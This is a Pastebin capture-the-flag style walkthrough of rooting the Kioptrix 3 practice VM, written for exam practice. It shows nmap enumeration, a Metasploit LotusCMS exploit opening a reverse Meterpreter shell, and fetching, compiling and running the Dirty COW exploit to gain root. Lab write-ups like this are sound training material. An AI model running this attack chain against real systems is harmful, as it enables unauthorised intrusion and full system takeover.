API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 26th, 2019
171
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.42 KB | None | 0 0
raw download clone embed print report
  1. Enumeration:
  2. Starting off with a basic nmap scan, and then going onto enumerating versions because there are only two services running. SSH and HTTP.
  3. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 18:53 EST
  4. Nmap scan report for kioptrix3.com (192.168.1.27)
  5. Host is up (0.00024s latency).
  6. Not shown: 998 closed ports
  7. PORT STATE SERVICE
  8. 22/tcp open ssh
  9. 80/tcp open http
  10. MAC Address: 00:0C:29:B8:ED:D5 (VMware)
  11.  
  12. Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
  13. root@spooky:~# nmap -sT -p 22,80 -A 192.168.1.27
  14. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 18:53 EST
  15. Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
  16. NSE Timing: About 0.00% done
  17. Nmap scan report for kioptrix3.com (192.168.1.27)
  18. Host is up (0.00030s latency).
  19.  
  20. PORT STATE SERVICE VERSION
  21. 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
  22. | ssh-hostkey:
  23. | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
  24. |_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
  25. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
  26. | http-cookie-flags:
  27. | /:
  28. | PHPSESSID:
  29. |_ httponly flag not set
  30. |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
  31. |_http-title: Ligoat Security - Got Goat? Security ...
  32. MAC Address: 00:0C:29:B8:ED:D5 (VMware)
  33. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  34. Device type: general purpose
  35. Running: Linux 2.6.X
  36. OS CPE: cpe:/o:linux:linux_kernel:2.6
  37. OS details: Linux 2.6.9 - 2.6.33
  38. Network Distance: 1 hop
  39. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  40.  
  41. TRACEROUTE
  42. HOP RTT ADDRESS
  43. 1 0.30 ms kioptrix3.com (192.168.1.27)
  44.  
  45. User:
  46. After searching for a little while and struggling to gain a foothold, I went back to the beginning and read the blog posts. After reading them I had noticed the "Login" page which I had glanced over. After a quick searchsploit lotuscms, I had found a RCE vulnerability for Metasploit. We can use "msf" to hop into metasploit, then use "search lotuscms" to get the path to the module. To use it we can do:
  47.  
  48. msf5 > use exploit/multi/http/lcms_php_exec
  49. msf5 exploit(multi/http/lcms_php_exec) >
  50.  
  51. Next we need to figure out what we need to supply metasploit with...
  52.  
  53. msf5 exploit(multi/http/lcms_php_exec) > show options
  54.  
  55. Module options (exploit/multi/http/lcms_php_exec):
  56.  
  57. Name Current Setting Required Description
  58. ---- --------------- -------- -----------
  59. Proxies no A proxy chain of format type:host:port[,type:host:port][...]
  60. RHOSTS yes The target address range or CIDR identifier
  61. RPORT 80 yes The target port (TCP)
  62. SSL false no Negotiate SSL/TLS for outgoing connections
  63. URI /lcms/ yes URI
  64. VHOST no HTTP server virtual host
  65.  
  66. So it looks like we just need to specify RHOSTS and URI. To do so we can use:
  67.  
  68. msf5 exploit(multi/http/lcms_php_exec) > set RHOSTS 192.168.1.27
  69. RHOSTS => 192.168.1.27
  70. msf5 exploit(multi/http/lcms_php_exec) > set URI /index.php?system=Admin
  71. URI => /index.php?system=Admin
  72.  
  73. And to execute it we need to type exploit!
  74.  
  75. msf5 exploit(multi/http/lcms_php_exec) > exploit
  76. [*] Started reverse TCP handler on 192.168.1.19:4444
  77. [*] Using found page param: /index.php?page=index
  78. [*] Sending exploit ...
  79. [*] Sending stage (38247 bytes) to 192.168.1.27
  80. [*] Meterpreter session 1 opened (192.168.1.19:4444 -> 192.168.1.27:48904) at 2019-01-26 18:39:57 -0500
  81.  
  82. meterpreter >
  83.  
  84. Awesome. We've got a shell, to drop into it we can easily type in "shell". While we're at it, we need to figure out who we're running as, what kernel, and what release for any pirv-esc exploits. But first, we should upgrade our shell with :
  85.  
  86. python -c "import pty; pty.spawn('/bin/bash')"
  87. www-data@Kioptrix3:/home/www/kioptrix3.com$
  88.  
  89. Perfect, now onto priv esc!
  90.  
  91. Priv Esc:
  92.  
  93. www-data@Kioptrix3:/home/www/kioptrix3.com
  94. $ uname -a
  95. Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
  96.  
  97. www-data@Kioptrix3:/home/www/kioptrix3.com
  98. $ cat /etc/lsb-release
  99. DISTRIB_ID=Ubuntu
  100. DISTRIB_RELEASE=8.04
  101. DISTRIB_CODENAME=hardy
  102. DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
  103. www-data@Kioptrix3:/home/www/kioptrix3.com$
  104.  
  105. So we're running on quite a dated Linux Kernel, which means it's likely that there's a privileged escalation exploit out.
  106.  
  107. After some googling it looks like the kernel is vulnerable to Dirty Cow. Specifically "Pokemon Dirty Cow", CVE 2016-5195. Thanks to FireFart for providing the exploit for us to use. You can check out the exploit on Exploit-DB (https://www.exploit-db.com/exploits/40839). We can wget the raw version on our box
  108.  
  109. root@spookysec
  110. #wget https://www.exploit-db.com/raw/40839 -O ./dirty.c
  111.  
  112. Now we need to host the file for Kioptrix3 to download with a SimpleHTTPServer.
  113.  
  114. root@spookysec
  115. #python -m SimpleHTTPServer 80
  116.  
  117. Serving HTTP on 0.0.0.0 port 80...
  118.  
  119. and back over on Kioptrix3, we can get the file with
  120.  
  121. www-data@Kioptrix3:/tmp$ wget http://192.168.1.19/dirty.c
  122.  
  123. and we can compile our exploit with
  124.  
  125. www-data@Kioptrix3:/tmp
  126. $ gcc -pthread dirty.c -o dirty -lcrypt
  127.  
  128. Make the file executable...
  129.  
  130. www-data@Kioptrix3:/tmp
  131. $ chmod +x dirty
  132.  
  133. And now execute with...
  134.  
  135. www-data@Kioptrix3:/tmp
  136. $ ./dirty
  137. /etc/passwd successfully backed up to /tmp/passwd.bak
  138. Please enter the new password: root
  139.  
  140. Complete line:
  141. firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash
  142.  
  143. After that the shell froze up, lets try SSHing in from our box with
  144. root@spookysec
  145. #ssh firefart@192.168.1.27
  146.  
  147. Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
  148.  
  149. The programs included with the Ubuntu system are free software;
  150. the exact distribution terms for each program are described in the
  151. individual files in /usr/share/doc/*/copyright.
  152.  
  153. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
  154. applicable law.
  155.  
  156. To access official Ubuntu documentation, please visit:
  157. http://help.ubuntu.com/
  158. firefart@Kioptrix3:~# id
  159. uid=0(firefart) gid=0(root) groups=0(root)
  160.  
  161. And rooted. This one wasn't too bad. However, the difficulty is starting to kick up a little bit! I haven't done a PWK box like this yet, but that's good. PWK Duplicates are great, but variety is needed. We need to be aware of lots of scenarios so we know how to handle them in an effective manner :D
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!